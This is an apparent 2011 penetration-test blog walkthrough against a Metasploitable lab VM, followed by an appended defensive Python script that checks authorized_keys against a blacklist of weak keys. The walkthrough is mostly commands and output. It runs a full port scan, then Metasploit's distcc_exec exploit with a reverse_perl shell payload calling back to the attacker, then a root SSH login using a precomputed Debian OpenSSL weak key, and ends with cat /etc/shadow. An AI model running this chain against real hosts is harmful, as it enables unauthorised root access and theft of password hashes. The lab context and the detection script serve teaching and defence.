November 14, 2011


A few days ago, I did a penetration test against the DistCC software using Metasploit and a little help from ExploitDB.

What you need:
  1. Metasploit Framework
  2. ExploitDB
  3. The guessable RSA keys (read the module text for the download link)

Steps:
  1. Log in to DistCC as the daemon user
  2. Find out which RSA public key the server uses
  3. Log in as root with the guessable RSA key

root@blue-dragon:~# nmap -sS -sV -p1-65535 -f -n -vv

Starting Nmap 5.61TEST2 ( ) at 2011-11-14 10:01 WIT
NSE: Loaded 11 scripts for scanning.
Initiating ARP Ping Scan at 10:01
Scanning [1 port]
Completed ARP Ping Scan at 10:01, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:01
Scanning [65535 ports]
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Discovered open port 53/tcp on
Discovered open port 25/tcp on
Discovered open port 21/tcp on
Discovered open port 3306/tcp on
Discovered open port 23/tcp on
Discovered open port 3632/tcp on
Discovered open port 8180/tcp on
Discovered open port 5432/tcp on
Completed SYN Stealth Scan at 10:01, 9.96s elapsed (65535 total ports)
Initiating Service scan at 10:01
Scanning 10 services on
Completed Service scan at 10:01, 21.02s elapsed (10 services on 1 host)
NSE: Script scanning
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for
Host is up (0.00040s latency).
Scanned at 2011-11-14 10:01:00 WIT for 31s
Not shown: 65524 closed ports
21/tcp   open     ftp        ProFTPD 1.3.1
22/tcp   open     ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open     telnet     Linux telnetd
25/tcp   open     smtp       Postfix smtpd
53/tcp   open     domain     ISC BIND 9.4.2
80/tcp   open     http       Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
3306/tcp open     mysql      MySQL 5.0.51a-3ubuntu5
3632/tcp open     distccd    distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open     postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp filtered ajp13
8180/tcp open     http       Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:3C:99:68 (VMware)
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds
           Raw packets sent: 66676 (2.934MB) | Rcvd: 65537 (2.622MB)


The scan results show that the server runs DistCC on port 3632. Let's get in as the daemon user with a little help from Metasploit (=

root@blue-dragon:~# msfconsole
msf > search distcc
msf > use exploit/unix/misc/distcc_exec
msf  exploit(distcc_exec) > set RHOST
msf  exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse_perl
msf  exploit(distcc_exec) > set LHOST
msf  exploit(distcc_exec) > show options 

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST      yes       The target address
   RPORT  3632             yes       The target port

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST      yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



msf  exploit(distcc_exec) > exploit 

[*] Started reverse handler on 
[*] Command shell session 1 opened ( -> at 2011-11-14 10:11:41 +0700

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ls -lart
total 16
drwxr-xr-x 21 root root 4096 Apr 28  2010 ..
drwxrwxrwt  2 root root 4096 Nov 13 11:04 .X11-unix
drwxrwxrwt  2 root root 4096 Nov 13 11:04 .ICE-unix
drwxrwxrwt  4 root root 4096 Nov 13 11:55 

ls -lart /root
total 32
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
-rw-r--r--  1 root root 2227 Oct 20  2007 .bashrc
-rwx------  1 root root  401 Apr 28  2010
-rw-------  1 root root  187 Apr 28  2010 .lesshst
drwxr-xr-x 21 root root 4096 Apr 28  2010 ..
drwxr-xr-x  3 root root 4096 May 17  2010 .
drwxr-xr-x  2 root root 4096 May 17  2010 .ssh
-rw-------  1 root root  123 Nov 13 11:32 .bash_history
ls -lart /root/.ssh
total 12
drwxr-xr-x 3 root root 4096 May 17  2010 ..
drwxr-xr-x 2 root root 4096 May 17  2010 .
-rw-r--r-- 1 root root  405 May 17  2010 authorized_keys
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

We get this key:


Then search ExploitDB for the RSA issue:

root@blue-dragon:~# cd /pentest/exploits/exploitdb/
root@blue-dragon:/pentest/exploits/exploitdb# ./searchsploit openssl
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/
OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
OpenSSL remote DoS                                                          /linux/dos/12334.c
root@blue-dragon:/pentest/exploits/exploitdb# cat platforms/multiple/remote/5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh 
keys generated, cause the only entropy is the pid of the process 
generating the key.

This leads to that the following perl script can be used with the 
precalculated ssh keys to brute force the ssh login. It works if such a 
keys is installed on a non-patched debian or any other system manual 
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore -

1. Download


Download the RSA keys from:

Extract them and search for the RSA key.

root@blue-dragon:~/tools/rsa/2048# grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub


Then log in over SSH with the key matching that .pub file.

root@blue-dragon:~/tools/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@
Last login: Sun Nov 13 11:31:21 2011 from
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
You have mail.
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:~# cat /etc/issue
Ubuntu 8.04 \n \l

root@metasploitable:~# cat /etc/shadow
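As a defender's check on the weak-key issue the walkthrough relies on (an added example, not code from the original post or from ExploitDB): a small auditor that parses an authorized_keys file, fingerprints each ssh-rsa entry the way `ssh-keygen -lf` does, and flags keys whose fingerprint appears on a blacklist of known predictable keys. The blacklist and both keys are constructed toy data; a real deployment would load the precomputed weak-key fingerprints instead.

```python
import base64
import hashlib
import struct

def encode_mpint(value: int) -> bytes:
    """Encode a non-negative integer as an SSH mpint (RFC 4251): length prefix, big-endian, sign-safe."""
    raw = value.to_bytes((value.bit_length() + 8) // 8, "big")  # extra byte keeps the sign bit clear
    return struct.pack(">I", len(raw)) + raw

def make_rsa_blob(e: int, n: int) -> str:
    """Build the base64 ssh-rsa blob for (e, n); used here only to construct sample keys."""
    blob = struct.pack(">I", 7) + b"ssh-rsa" + encode_mpint(e) + encode_mpint(n)
    return base64.b64encode(blob).decode()

def fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint in the form `ssh-keygen -lf` prints (unpadded base64 of the digest)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_line(line: str):
    """(key_type, blob, comment) for an authorized_keys entry; None for blank, comment or option-prefixed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 2)
    if len(parts) < 2 or not parts[0].startswith("ssh-"):
        return None
    return parts[0], parts[1], (parts[2] if len(parts) == 3 else "")

def audit(authorized_keys: str, blacklist: set) -> list:
    """Return (line_no, comment, fingerprint) for every key whose fingerprint is blacklisted."""
    findings = []
    for num, line in enumerate(authorized_keys.splitlines(), 1):
        parsed = parse_line(line)
        if parsed is None:
            continue
        _, blob, comment = parsed
        fp = fingerprint(blob)
        if fp in blacklist:
            findings.append((num, comment, fp))
    return findings

# Constructed sample: two toy RSA keys (tiny moduli) and a blacklist seeded with the first one's fingerprint.
WEAK_BLOB = make_rsa_blob(65537, 0xC0FFEE1234567890DEADBEEF0BADF00D)
CLEAN_BLOB = make_rsa_blob(65537, 0xFEEDFACE0123456789ABCDEF13579BDF)
WEAK_BLACKLIST = {fingerprint(WEAK_BLOB)}
SAMPLE_AUTHORIZED_KEYS = f"""# constructed authorized_keys sample
ssh-rsa {WEAK_BLOB} msfadmin@metasploitable
ssh-rsa {CLEAN_BLOB} admin@example.invalid
"""
```

Running `audit(SAMPLE_AUTHORIZED_KEYS, WEAK_BLACKLIST)` reports only line 2, the entry whose fingerprint is on the blacklist; on a real host, point it at each user's authorized_keys and a blacklist built from the precomputed key set.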


Written By
Blue Dragon

Supported By
Red Dragon
